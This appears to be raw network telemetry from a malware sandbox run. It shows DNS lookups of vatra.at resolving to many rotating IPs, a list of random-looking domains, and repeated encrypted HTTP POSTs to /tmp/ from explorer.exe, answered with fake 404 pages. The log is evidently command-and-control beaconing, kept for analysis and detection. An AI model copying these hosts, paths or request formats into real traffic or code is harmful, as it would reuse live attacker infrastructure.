Jan 3, 2023 09:46:56.346973896 CET	8.8.8.8	192.168.2.5	0xe62c	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:57.067291975 CET	8.8.8.8	192.168.2.5	0x82bd	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:46:58.623935938 CET	8.8.8.8	192.168.2.5	0xc830	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:00.088844061 CET	8.8.8.8	192.168.2.5	0x2229	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:02.193207979 CET	8.8.8.8	192.168.2.5	0xf2d3	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:03.332684994 CET	8.8.8.8	192.168.2.5	0x11d3	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	211.171.233.126	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	187.212.192.17	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	178.31.8.68	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	175.120.254.9	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	58.235.189.192	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	93.112.238.85	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	195.158.3.162	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	190.140.74.43	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	175.126.109.15	A (IP address)	IN (0x0001)	false
Jan 3, 2023 09:47:04.931497097 CET	8.8.8.8	192.168.2.5	0x5924	No error (0)	vatra.at	190.147.188.50	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

degroeneuitzender.nl

vtnltmuyju.net

vatra.at

owtqjcmscg.com

yclbkevn.com

bvgxojnl.net

eaybestph.net

ywmrapro.org

bmjduhjgq.net

bagetn.org

bdiba.net

eaamgxfkry.net

bcdjbmpl.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49714	5.135.247.111	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49708	195.158.3.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:46:27.109616041 CET	138	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vtnltmuyju.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 142 Host: vatra.at
Jan 3, 2023 09:46:27.109632015 CET	138	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 71 3a af a6 Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA .[k,vuq:BBnS6cT)6![bSC'?s;V
Jan 3, 2023 09:46:27.672688007 CET	139	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:46:27 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 8 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 04 00 00 00 72 e8 85 ea Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49721	190.140.74.43	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:47:02.399616003 CET	835	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eaamgxfkry.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 316 Host: vatra.at
Jan 3, 2023 09:47:02.402019024 CET	835	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 61 30 d8 f4 Data Ascii: ;nUj/uynj4Y[mPn?$`7C[zqNA -[k,vua0^^qRw%~zpU((%[@kTS#!&=}=;@TtxG69_BG:lWOwli#4[m
Jan 3, 2023 09:47:03.289249897 CET	836	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:47:02 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49722	190.140.74.43	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:47:03.538563967 CET	837	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bcdjbmpl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 222 Host: vatra.at
Jan 3, 2023 09:47:03.538582087 CET	837	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 26 0e fc 91 Data Ascii: ;nUj/uynj4Y[mPn?$`7C[zqNA -[k,vu&<r}B\m0N\4Ad[2&<E]KX#`4f_=NM#mrV0!69&Ve5
Jan 3, 2023 09:47:04.442612886 CET	838	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:47:03 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49709	175.120.254.9	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:46:28.845990896 CET	140	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://owtqjcmscg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 118 Host: vatra.at
Jan 3, 2023 09:46:28.848963976 CET	140	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 42 0c d9 fd Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vuBYKFSlQ2O\[
Jan 3, 2023 09:46:30.059654951 CET	141	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:46:29 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.5	49710	58.235.189.192	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:46:30.477191925 CET	142	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yclbkevn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 231 Host: vatra.at
Jan 3, 2023 09:46:30.477214098 CET	142	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 6e 43 c5 9f Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vunC7\dGl!sK5' fb7QD?=8:Fv7,S1\}UIqwkx0d33aSKYGz
Jan 3, 2023 09:46:31.671641111 CET	142	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:46:31 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 43 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 d0 9e 5c 28 53 3b 08 a6 69 5f b5 aa 13 a5 d0 ba f3 6d 87 21 c7 f7 30 14 10 94 8f Data Ascii: #\(S;i_m!0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.5	49713	211.171.233.126	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:46:53.185036898 CET	152	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bvgxojnl.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 293 Host: vatra.at
Jan 3, 2023 09:46:53.185298920 CET	152	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 5b 5a c0 85 Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA -[k,vu[ZM5DL2NfFV-d@.\|slUU<E;u`\}%Pu=2d?E].bHbEONv[-F,
Jan 3, 2023 09:46:54.494102955 CET	152	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:46:53 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 58 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 0f 6f 41 e6 37 0f f5 fd 52 fa 8a f8 af 2c 90 2b c7 b6 2d 56 5a 9f 93 9c da 61 d9 2d 5a 1a 91 06 8f 41 28 43 5c ad Data Ascii: #\6oA7R,+-VZa-ZA(C\

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.5	49715	93.112.238.85	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:46:55.877154112 CET	818	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://eaybestph.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 157 Host: vatra.at
Jan 3, 2023 09:46:55.879159927 CET	818	OUT	Data Raw: 3b 6e 55 15 f7 bf 6a 2f ae ad b5 00 03 75 0b bb 0d 79 bb e0 6e 04 e4 6a 08 0b 0b e7 34 c7 c7 1a ee 59 c2 5b 07 6d 50 6e ef 9a 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 08 6b 2c 90 f4 76 0b 75 48 2c ad 90 Data Ascii: ;nUj/uynj4Y[mPn?*$`7C[zqNA ,[k,vuH,hg-)A{woEhg?^A3KJ<9D~c\.
Jan 3, 2023 09:46:56.320611954 CET	819	IN	HTTP/1.0 404 Not Found Date: Tue, 03 Jan 2023 08:46:56 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 331 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.5	49716	195.158.3.162	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 3, 2023 09:46:56.466929913 CET	820	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ywmrapro.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 327 Host: vatra.at
